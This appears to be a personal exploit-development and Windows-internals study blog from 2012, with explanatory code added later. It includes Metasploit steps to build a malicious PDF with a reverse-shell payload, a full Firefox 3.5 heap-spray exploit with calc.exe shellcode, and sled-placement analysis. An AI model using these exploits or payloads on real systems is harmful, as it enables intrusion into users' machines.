Saturday, April 28, 2012

Open a website from the command prompt

"C:\Program Files\Internet Explorer\iexplore.exe" http://www.yahoo.com


"C:\Program Files\Internet Explorer\iexplore.exe" C:\hello.html

Metasploit usage

1. Download and install it.
2. Open the Metasploit console.
Windows: go to Programs.
Linux: type msf<tab>; it will show you the available commands (msfconsole is the one you want).

3. Go to the Metasploit website, search for an exploit module, and download the specific (vulnerable) version of the application it targets so you can test against it.

4. It will look like:
msf > use exploit/windows/fileformat/adobe_reader_u3d
msf exploit(adobe_reader_u3d) > show payloads
msf exploit(adobe_reader_u3d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_reader_u3d) > set LHOST [MY IP ADDRESS]
msf exploit(adobe_reader_u3d) > exploit

Note that this is a fileformat module: exploit only writes a malicious PDF to disk (the console prints the path); nothing connects back until a victim opens it. To catch the reverse_tcp session, start a listener first with exploit/multi/handler using the same PAYLOAD, LHOST and LPORT.

5. For example, you can set the payload to windows/exec:
msf > use exploit/....
msf > set PAYLOAD windows/exec
msf > set CMD calc.exe

6. In this case, if your shellcode executes, the Calculator will show up on the screen.

Convert binary shellcode to JavaScript percent (%u) encoding


<html>
<head>
<script language="JavaScript" type="text/javascript">
// Turns "\x90\x90\xcc..." (or bare hex) into the "%uXXYY" form that a
// JavaScript exploit feeds to unescape(). Each %u token is one 16-bit code
// unit stored little-endian, so the byte pair "90 cc" is emitted as "%ucc90".
function ConvertShellCode(strdata)
{
    var s = new String(strdata);
    s = s.replace(/[\s\\x]/g, '');   // strip whitespace, backslashes and "x"
    if (s.length % 4 == 2)
        s += "90";                    // odd byte count: pad with a NOP so the last token is complete
    var strcode = '';

    for(var idx=0; idx<s.length; idx+=4)
        strcode += "%u" + s.substr(idx+2,2) + s.substr(idx+0,2);   // swap the two bytes of each pair

    document.forms.ShellToJavascript.decode.value = strcode;
}
</script>
</head>
<body>
<form name="ShellToJavascript" method="post">
<textarea rows="10" cols="100" name="encode"></textarea><br />
<textarea rows="10" cols="100" name="decode"></textarea><br />
<input type="button" value="Encode" onclick="return ConvertShellCode(document.ShellToJavascript.encode.value)" />
</form>
</body>
</html>

http://www.governmentsecurity.org/forum/topic/27916-shell-code-convertorencoder/

Tuesday, April 24, 2012

How to write shellcode; reverse shellcode

http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html

Use Metasploit to generate shellcode

This post explains how to use Metasploit to generate binary shellcode:

http://www.backtrack-linux.org/forums/showthread.php?t=35480


msf > use windows/exec
msf payload(exec) > show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none

msf payload(exec) > set cmd taskkill /PID 12345
cmd => taskkill /PID 12345
msf payload(exec) > show options

Module options:

   Name      Current Setting      Required  Description
   ----      ---------------      --------  -----------
   CMD       taskkill /PID 12345  yes       The command string to execute
   EXITFUNC  process              yes       Exit technique: seh, thread, process, none

msf payload(exec) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

    -E        Force encoding.
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -e <opt>  The name of the encoder module to use.
    -f <opt>  The output file name (otherwise stdout)
    -h        Help banner.
    -i <opt>  the number of encoding iterations.
    -k        Keep the template executable functional
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The Platform for output.
    -s <opt>  NOP sled length.
    -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -x <opt>  The executable template to use

msf payload(exec) > generate -t exe -f /root/windows-exec-payload.exe
[*] Writing 73802 bytes to /root/windows-exec-payload.exe...
msf payload(exec) > generate -f /root/windows-exec-payload.shellcode
[*] Writing 1013 bytes to /root/windows-exec-payload.shellcode...

Use -t raw to get the bare bytes, and -t js_le to get the "%u" form used in the heap-spray post.

Monday, April 23, 2012

User program writing to I/O ports on Windows

http://retired.beyondlogic.org/porttalk/porttalk.htm

Download the PortTalk 2.2 folder.
Read the README file; it explains how to use it.

C:\porttalk>allowio beep /a
allows beep.exe to access all I/O ports

C:\porttalk\AllowIO>allowio 0x42 0x43 0x61 beep.exe
allows beep.exe to access only ports 0x42, 0x43 and 0x61 (PIT channel 2, the PIT control port and the PC-speaker port). Prefer this form over /a, which opens the whole port range to the program.


Look at the IoExample folder for a sample user program that writes to ports.

In addition, we can write to a port with the assembly I/O instruction
out dx, al
Assemble it into WritePort.exe, and use AllowIo.exe to set the I/O permission bitmap for this executable:
AllowIo.exe WritePort.exe /a

Again, AllowIo.exe talks to the PortTalk kernel driver through IOCTL calls; the driver either edits the process's I/O permission bitmap (IOPM) so that in/out instructions from ring 3 are allowed, or performs the port read/write on the program's behalf. Without that, a user-mode out instruction faults with a privileged-instruction exception.

Website to download old versions of applications

http://www.oldapps.com/

Sunday, April 22, 2012

Build Firefox Source code

Download Source Code:
https://developer.mozilla.org/En/Developer_Guide/Source_Code/Downloading_Source_Archives

Compile & Build:
https://developer.mozilla.org/En/Simple_Firefox_build
https://developer.mozilla.org/en/Build_Documentation

Crash CentOS...

I crashed my CentOS testing machine today. The command I ran:
 $ yum remove glib2

I was trying to reinstall glib2 (I know there is a reinstall command, but I don't know why I didn't use that one), and I removed the glib2 package. 

After I ran this command, I went out for dinner. 

When I came back, my system had crashed. I tried many ways to rescue it, but none of them helped. 
For example: 
reboot into another kernel;
put in the CentOS installation disk, upgrade the OS, rescue the OS.....

Finally, I reinstalled CentOS. One lucky thing is that I had backed up all my data on the server. 

Never, never remove the glib2 package in future...

Saturday, April 21, 2012

CentOS 5.5 Download

http://mirror.teklinks.com/centos/5.5/isos/i386/
http://centos.org/modules/tinycontent/index.php?id=15

Go to the CentOS website to get the download mirror list.
Some mirrors don't carry the full list of CentOS versions; you need to check them one by one.

Memory tools on Windows

vmmap
http://technet.microsoft.com/en-us/sysinternals/dd535533
cheatengine
http://www.cheatengine.org/

Thursday, April 19, 2012

Run Python on Windows

1. Download Python
http://python.org/download/

2. Install it. It is usually installed at C:\Python27

3. To run it from anywhere you need to add C:\Python27 to the PATH environment variable.
http://docs.python.org/faq/windows.html#how-do-i-run-a-python-program-under-windows
Add

;C:\Python27

to the PATH environment variable in the
properties window of "My Computer" under the "Advanced" tab

4. Type python from the command line

VMware fusion snapshot

VMware Fusion saves the whole guest memory image (the .vmem file) when you take a snapshot. You can find it in the VM's folder, which makes a snapshot a convenient way to grab a memory dump for the kinds of walks described in the other posts here.

Here are some more detailed info about VMware snapshot
http://www.vmware.com/support/ws4/doc/preserve_snapshot_ws.html

OS161 Homework

Very good post on OS161 homework implementation:
http://jhshi.wordpress.com/category/os161/

Or you can find some sample code by searching for: "OS161 googleproject"

Reverse JavaScript shellcode

http://pmelson.blogspot.com/2009/11/reversing-javascript-shellcode-step-by.html

It is a detailed post, but one thing I don't understand is the SpiderMonkey part.

After using SpiderMonkey to translate the original percent-encoded data, the result is totally different from the original data.

However, one comment on this post points out that we only need to remove the "%u" and reverse the order of the original data.

Not sure which way is correct.

But it is a very good post for reversing JS shellcode.

BTW, I installed SpiderMonkey on CentOS without any problem.
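The converter from the April 28 post and the question here are the same operation in opposite directions, so one added example covers both. This is my code, not the post's or the linked article's: it encodes raw bytes into the "%uXXYY" form, decodes that form back with the "drop the %u and swap each byte pair" rule, and cross-checks the rule against what unescape() itself produces once its output is laid out as UTF-16LE, which is how the string sits in memory. Node.js is assumed; the 12-byte sample is taken from the calc.exe shellcode in the Firefox 3.5 page below.

```javascript
// Added example (not from either post): %u encoding of shellcode and the
// reverse. Node.js; `unescape` is the same legacy function the exploits use.

function hex2(n) {
  return n.toString(16).toUpperCase().padStart(2, '0');
}

// Raw bytes -> "%uXXYY". Each %u token is one 16-bit code unit, and the
// string sits in memory as UTF-16LE with the LOW byte first, so the byte
// pair [b0, b1] must be written as %u<b1><b0>. An odd trailing byte is
// padded with a NOP so it still forms a complete code unit.
function bytesToPercentU(bytes, pad = 0x90) {
  const b = Array.from(bytes);
  if (b.length % 2) b.push(pad);
  let out = '';
  for (let i = 0; i < b.length; i += 2) out += '%u' + hex2(b[i + 1]) + hex2(b[i]);
  return out;
}

// "%uXXYY" -> raw bytes: the "remove %u and swap each pair" rule from the
// comment the post mentions. "%uE860" -> 60 E8.
function percentUToBytes(str) {
  const out = [];
  for (const [, hi, lo] of str.matchAll(/%u([0-9a-fA-F]{2})([0-9a-fA-F]{2})/g)) {
    out.push(parseInt(lo, 16), parseInt(hi, 16));
  }
  return Buffer.from(out);
}

// Cross-check against the interpreter: unescape() yields code units, and
// serialising them as UTF-16LE gives exactly the same byte order. Printing
// the code units as text instead (what a shell script tends to do) shows
// unrelated characters, which is why the output can look "totally different".
function percentUToBytesViaUnescape(str) {
  return Buffer.from(unescape(str), 'utf16le');
}

// Accept the "\x90\x90" / "90 90" text that the converter form takes.
function hexTextToBytes(text) {
  return Buffer.from(text.replace(/[\s\\x]/g, ''), 'hex');
}

// Constructed sample: the first six %u tokens of the calc.exe shellcode in
// the Firefox 3.5 page below (E8 00000000 = call $+5, 5D = pop ebp, ...).
const sample = '%uE860%u0000%u0000%u815D%u06ED%u0000';

console.log(percentUToBytes(sample).toString('hex'));
console.log(bytesToPercentU(percentUToBytes(sample)) === sample ? 'round trip ok' : 'mismatch');
```

Both readings in the post agree: SpiderMonkey's unescape() gives code units whose little-endian bytes are exactly the swapped pairs, so the bytes you feed to a disassembler are the same whichever way you get them.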

Heap Spray Attack

http://1337day.com/exploits/9493

Vulnerability + NOP sled + shellcode

e.g., this is an exploit HTML file targeting Firefox 3.5.
It uses a heap spray to launch calc.exe on Windows.
The same vulnerability exists in the same Firefox version on Linux, but the shellcode needs to be modified.


<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>                          
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=JavaScript>

/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
                       "%u652E%u6578%u9000");


/* Heap Spray Code */          
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x40001)
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()

function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
   c=data.charAt(i);
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
   escData+=c;
  }
 return escData;
}

function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}

function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }  
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>

NOP sleds in heap spray

The NOP sled in a heap spray is more general: it doesn't have to be 0x90. It can be any byte sequence that, decoded from whatever offset execution happens to land on, does not damage the registers the shellcode relies on and slides through to the shellcode.
For example
0c0c: this decodes as OR AL, 0x0C.
Each pair of sled bytes only sets bits in AL, the low byte of EAX; as long as that doesn't crash the program before the shellcode runs (the shellcode above saves and restores the registers with pusha/popa anyway), the block of 0x0c bytes works as a sled and 0x0c0c0c0c doubles as the landing address.

http://www.ask-a-pentester.com/index.php/9/about-nop-slides-in-js-heap-overflows
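To make the sled arithmetic concrete, here is an added example of my own, not part of the exploit or the linked article: it rebuilds one spray block exactly as the script above does, works out where 0x0c0c0c0c lands relative to the sprayed strings, and checks the "decodes harmlessly from any entry point" property with a tiny decoder for the few opcodes that make good sled material. The heap base, the back-to-back layout and the shellcode length (143 code units, counted from the string above) are assumptions; real allocators add a per-string header that shifts the offsets a little but not the conclusions. Node.js.

```javascript
// Added example (not the exploit's code): spray arithmetic and sled safety
// for the Firefox 3.5 heap spray above. Node.js.
const BYTES_PER_UNIT = 2;          // JavaScript strings are UTF-16
const HEAP_BASE = 0x02000000;      // ASSUMPTION: where the spray starts in the
                                   // browser heap; illustration only
const CALC_SHELLCODE_UNITS = 143;  // %u tokens in the calc.exe string above

// 1. Build one spray block exactly as the exploit does: double "%u0c0c%u0c0c"
//    until it is at least 0x40001 code units long.
function buildSprayBlock(minUnits = 0x40001) {
  let block = unescape('%u0c0c%u0c0c');
  while (block.length < minUnits) block += block;
  return block;
}

// 2. Where does the target address fall? Every sprayed string is one sled
//    block followed by the shellcode; assume the strings sit back to back.
function sprayLanding(target, blockUnits, shellcodeUnits, copies) {
  const sledBytes = blockUnits * BYTES_PER_UNIT;
  const strideBytes = (blockUnits + shellcodeUnits) * BYTES_PER_UNIT;
  const sprayEnd = HEAP_BASE + copies * strideBytes;
  const covered = target >= HEAP_BASE && target < sprayEnd;
  const offsetInBlock = (target - HEAP_BASE) % strideBytes;
  return {
    covered,
    offsetInBlock,
    inSled: covered && offsetInBlock < sledBytes,  // lands in sled, not on the payload
    sledFraction: sledBytes / strideBytes,          // chance of a clean landing
    sprayMiB: (copies * strideBytes) / 2 ** 20,
  };
}

// 3. A sled byte sequence is usable only if execution entering at any offset
//    decodes into harmless instructions and stops exactly at the payload.
//    Minimal decoder for the opcodes worth using as sled material:
function safeInsnLen(opcode) {
  if (opcode === 0x90) return 1;                     // nop
  if (opcode === 0x0c) return 2;                     // or al, imm8
  if (opcode >= 0x40 && opcode <= 0x47) return 1;    // inc r32
  return 0;                                          // not on the safe list
}

function sledEntryReport(sled) {
  let clean = 0, badOpcode = 0, overrun = 0;
  for (let entry = 0; entry < sled.length; entry++) {
    let pc = entry, ok = true;
    while (pc < sled.length) {
      const len = safeInsnLen(sled[pc]);
      if (len === 0) { ok = false; break; }
      pc += len;
    }
    if (!ok) badOpcode++;
    else if (pc !== sled.length) overrun++;  // last insn swallows payload byte(s)
    else clean++;
  }
  return { clean, badOpcode, overrun };
}

// The exploit's own parameters: 0x0c0c0c0c target, 600 copies.
function firefoxSprayReport() {
  const block = buildSprayBlock();
  const sledTail = Buffer.from(block, 'utf16le').subarray(-16); // last 16 bytes before the payload
  return {
    blockUnits: block.length,
    landing: sprayLanding(0x0c0c0c0c, block.length, CALC_SHELLCODE_UNITS, 600),
    sled: sledEntryReport(sledTail),
    nop: sledEntryReport(Buffer.alloc(16, 0x90)),
  };
}

console.log(JSON.stringify(firefoxSprayReport(), null, 2));
```

Two things the numbers show. Each block is 0x80000 code units, 1 MiB of 0x0c bytes, so 600 copies spray roughly 600 MiB and 0x0c0c0c0c (about 202 MiB in) is well inside it, landing in the sled for all but the last few hundred bytes of each block. And the 0x0c sled is only safe at even entry offsets: each OR AL consumes two bytes, so an odd entry makes the final one swallow the first shellcode byte (E8 of the call), which a 0x90 sled never does. That is why the landing address has to stay 2-byte aligned relative to the string data.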

Tuesday, April 17, 2012

Hacking websites (exploit and malware archives)

milw0rm successor: http://1337day.com/

http://www.exploit-db.com/

http://www.metasploit.com/

http://contagiodump.blogspot.com/

http://www.offensivecomputing.net/

Windows Kernel Debugging

How to set up Windows kernel debugging: see the post "Windows Kernel Debugging by using serial port" (April 9) below.

Some useful commands:
> dt _eprocess // layout of the EPROCESS structure
> dt _peb // process environment block
> dt _kprocess // kernel process structure (the Pcb at the start of EPROCESS)
> dt _heap // heap structure
> dt _heap_segment
> dt _heap_entry

Application debugging (e.g. Firefox)
> !process 0 0 // list all running processes, with the EPROCESS address, DirBase and Peb of each
> .context <dirbase_address> // switch the debugger to that process's user-mode address space; take the DirBase value from the Firefox entry in the !process 0 0 output (.process /p <eprocess_address> does the same starting from the EPROCESS address). Sometimes you need to run the following first so that the kernel debugger decodes user-mode pages at all:
> .cache forcedecodeuser

> dt _peb <peb_address_of_Firefox>

> dd <address> // dump the dwords at that location, like the x command in the QEMU monitor

> dd /p <address> // dump physical memory at that address

> dt _heap <heap_address>

> dt _heap_entry <heap_entry_address>

Saturday, April 14, 2012

Disable PAE on Windows XP SP3


Go to My Computer -> Properties; the General tab lists "Physical Address Extension" when PAE is enabled.
The CPU runs with PAE when bit 5 (the PAE flag) of control register CR4 is set. Bits are numbered from 0 at the least significant end, so this is the sixth bit counting from the right, not from the left.


Disable method (edit boot.ini):

Normal boot.ini with PAE & DEP

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Pro x86" /noexecute=optin /fastdetect

Disabled DEP & PAE

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Pro x86" /execute /fastdetect

On XP SP2 and later, /noexecute makes the loader pick the PAE kernel (ntkrnlpa.exe) on NX-capable CPUs, which is why /execute alone brings back the non-PAE kernel; add /nopae if you want to force the non-PAE kernel regardless of the DEP setting.

Tuesday, April 10, 2012

wget in Mac

echo 'alias wget="curl -O"' >> ~/.bash_profile


curl -O url
-O (capital letter O) saves the file under its remote name in the current directory
curl -o filename url
-o filename saves it as filename instead
Do not confuse these with -0 (the digit zero), which means "use HTTP/1.0".
For more see man curl

Monday, April 9, 2012

Windows Kernel Debugging by using serial port

1. Set up two machines: the target machine and the debugging machine.

2. Download WinDbg on the debugging machine
http://msdn.microsoft.com/en-us/windows/hardware/gg463009
For Windows XP you need to download the Windows 7 version.

3. Change the boot.ini file on the target machine to add a debug entry that uses the COM1 serial port.

4. Boot the target machine into debugging mode (press F8 when booting and pick the debug entry).

5. Start WinDbg on the debugging machine, and choose the correct device,
e.g. a serial-to-USB adapter.

6. Set the correct symbol path,
e.g. srv*c:\symbols*http://msdl.microsoft.com/download/symbols

7. Run dt _eprocess to confirm that the symbols resolve.

How to change boot.ini
http://www.etdot.com/2008/04/16/windbg-and-vmware/
http://support.microsoft.com/kb/289022

You can also get more information from: Windows Internals, 5th Edition

Another book: Advanced Windows Debugging


Friday, April 6, 2012

QEMU monitor usage page

http://wiki.qemu.org/download/qemu-doc.html

common commands:
stop: pause the virtual machine
c or cont: resume the machine

x /20w location: dump 20 32-bit words at a virtual address
x /20c location: dump the content as characters
x /fmt location: fmt is /count followed by a format letter (x hex, d signed, u unsigned, o octal, c char, i instruction) and a size letter (b byte, h halfword, w word, g 64-bit), e.g. x /20wx 0xffdff034

xp /20w location: the same, but at a physical memory address


Tuesday, April 3, 2012

How to find PsActiveProcessHead in memory on Windows


PsActiveProcessHead is the head of the kernel's doubly linked list of _EPROCESS structures.

1. Get the FS segment base in kernel mode: 0xffdff000, which is the Kernel Processor Control Region (KPCR) on a single-processor XP machine
2. KdVersionBlock is at offset 0x34 of the KPCR
3. Get the KdVersionBlock value: 0x8054c738 (run x /20w 0xffdff034 in the QEMU monitor)
4. PsActiveProcessHead is at offset 0x78 of the KdVersionBlock, i.e. at location 0x8054c7b0
5. Get the PsActiveProcessHead value: 0x80560bd8 (run x /20w 0x8054c7b0)
6. PsActiveProcessHead is a LIST_ENTRY (Flink at +0, Blink at +4). Each Flink points at the ActiveProcessLinks field inside the next _EPROCESS, not at its start, so subtract the offset of ActiveProcessLinks (0x88 on XP SP3; confirm with dt _eprocess in WinDbg) to get the _EPROCESS address. The list is circular and ends when a Flink points back at the head
7. See the process name (the ImageFileName field of the _EPROCESS; run x /20c location)

The addresses in steps 1, 3 and 5 are what this particular XP guest showed; KdVersionBlock and PsActiveProcessHead move between builds and patch levels, so repeat steps 3 and 5 on your own image.

More Info:

http://www.reverse-engineering.info/SystemInformation/GetVarXP.pdf
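Putting steps 1-7 into code, as an added example that is not from the post or the linked PDF: the walker below runs over a constructed in-memory image (no real dump needed) that reuses the addresses observed above. The KPCR+0x34 and KdVersionBlock+0x78 offsets are the post's; the _EPROCESS offsets ActiveProcessLinks 0x88 and ImageFileName 0x174 are my assumptions for XP SP3 and should be verified with dt _eprocess. It also checks Blink on every hop, which is the usual sanity test against a corrupted list or a wrong offset. Node.js.

```javascript
// Added example (not from the post): walk PsActiveProcessHead over a
// constructed memory image. Node.js. Offsets marked ASSUMPTION are XP SP3
// values to verify with `dt _eprocess`; the rest come from the steps above.
const KPCR = 0xffdff000;                 // step 1: FS base in kernel mode
const KPCR_KDVERSIONBLOCK = 0x34;        // step 2
const KDVB_PSACTIVEPROCESSHEAD = 0x78;   // step 4
const EPROC_ACTIVEPROCESSLINKS = 0x88;   // ASSUMPTION: _EPROCESS.ActiveProcessLinks
const EPROC_IMAGEFILENAME = 0x174;       // ASSUMPTION: _EPROCESS.ImageFileName (16 bytes)

// Sparse virtual memory made of mapped regions, read like QEMU's `x /w`.
class Memory {
  constructor() { this.regions = []; }
  map(base, size) {
    const buf = Buffer.alloc(size);
    this.regions.push({ base, buf });
    return buf;
  }
  region(va) {
    const r = this.regions.find(x => va >= x.base && va < x.base + x.buf.length);
    if (!r) throw new Error('unmapped address 0x' + va.toString(16));
    return r;
  }
  read32(va) { const r = this.region(va); return r.buf.readUInt32LE(va - r.base); }
  write32(va, v) { const r = this.region(va); r.buf.writeUInt32LE(v >>> 0, va - r.base); }
  readCString(va, max) {
    const r = this.region(va);
    const s = r.buf.subarray(va - r.base, va - r.base + max);
    const nul = s.indexOf(0);
    return s.subarray(0, nul < 0 ? max : nul).toString('latin1');
  }
}

// Steps 1-5: KPCR -> KdVersionBlock -> address of PsActiveProcessHead.
function findPsActiveProcessHead(mem) {
  const kdVersionBlock = mem.read32(KPCR + KPCR_KDVERSIONBLOCK);
  return mem.read32(kdVersionBlock + KDVB_PSACTIVEPROCESSHEAD);
}

// Steps 6-7: follow Flink around the circular list. Each Flink points at the
// ActiveProcessLinks field inside an _EPROCESS, so subtract its offset to get
// the structure base. Blink is checked at every hop; a mismatch means the
// list (or our offset) is wrong, so stop rather than walk garbage.
function listProcesses(mem, maxEntries = 4096) {
  const head = findPsActiveProcessHead(mem);
  const names = [];
  let link = mem.read32(head);                        // head.Flink
  while (link !== head && names.length < maxEntries) {
    const eprocess = link - EPROC_ACTIVEPROCESSLINKS;
    names.push(mem.readCString(eprocess + EPROC_IMAGEFILENAME, 16));
    const next = mem.read32(link);                    // this.Flink
    if (mem.read32(next + 4) !== link) {              // next.Blink must point back
      throw new Error('Blink mismatch at 0x' + link.toString(16));
    }
    link = next;
  }
  return names;
}

// Constructed image reusing the addresses the post saw in its XP guest;
// the two _EPROCESS addresses and the process names are made up.
function buildSampleImage() {
  const KDVB = 0x8054c738, HEAD = 0x80560bd8;
  const procs = [[0x81a2c830, 'System'], [0x81b5e020, 'firefox.exe']];
  const mem = new Memory();
  mem.map(KPCR, 0x1000);
  mem.map(KDVB, 0x100);
  mem.map(HEAD, 8);
  mem.write32(KPCR + KPCR_KDVERSIONBLOCK, KDVB);
  mem.write32(KDVB + KDVB_PSACTIVEPROCESSHEAD, HEAD);
  for (const [base, name] of procs) {
    mem.map(base, 0x260).write(name, EPROC_IMAGEFILENAME, 'latin1');
  }
  // Circular list: HEAD -> proc0 -> proc1 -> HEAD, with Blink going the other way.
  const links = [HEAD, ...procs.map(([base]) => base + EPROC_ACTIVEPROCESSLINKS)];
  links.forEach((l, i) => {
    mem.write32(l, links[(i + 1) % links.length]);                    // Flink
    mem.write32(l + 4, links[(i + links.length - 1) % links.length]); // Blink
  });
  return mem;
}

console.log(listProcesses(buildSampleImage()));
```

To run this on a real dump, replace the Memory class with something that translates virtual to physical addresses through the page tables (the DirBase from !process 0 0), or point it at the QEMU monitor's x command; the walk itself does not change.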


Monday, April 2, 2012

Find useful memory in windows

http://www.reverse-engineering.info/SystemInformation/GetVarXP.pdf

http://forum.sysinternals.com/devphysicalmemoryfinding-my-peb_topic3473.html

http://moyix.blogspot.com/2008/04/finding-kernel-global-variables-in.html




http://www.facultyresourcecenter.com/curriculum/ResourceKits/Default.aspx?c1=en-us&c2=0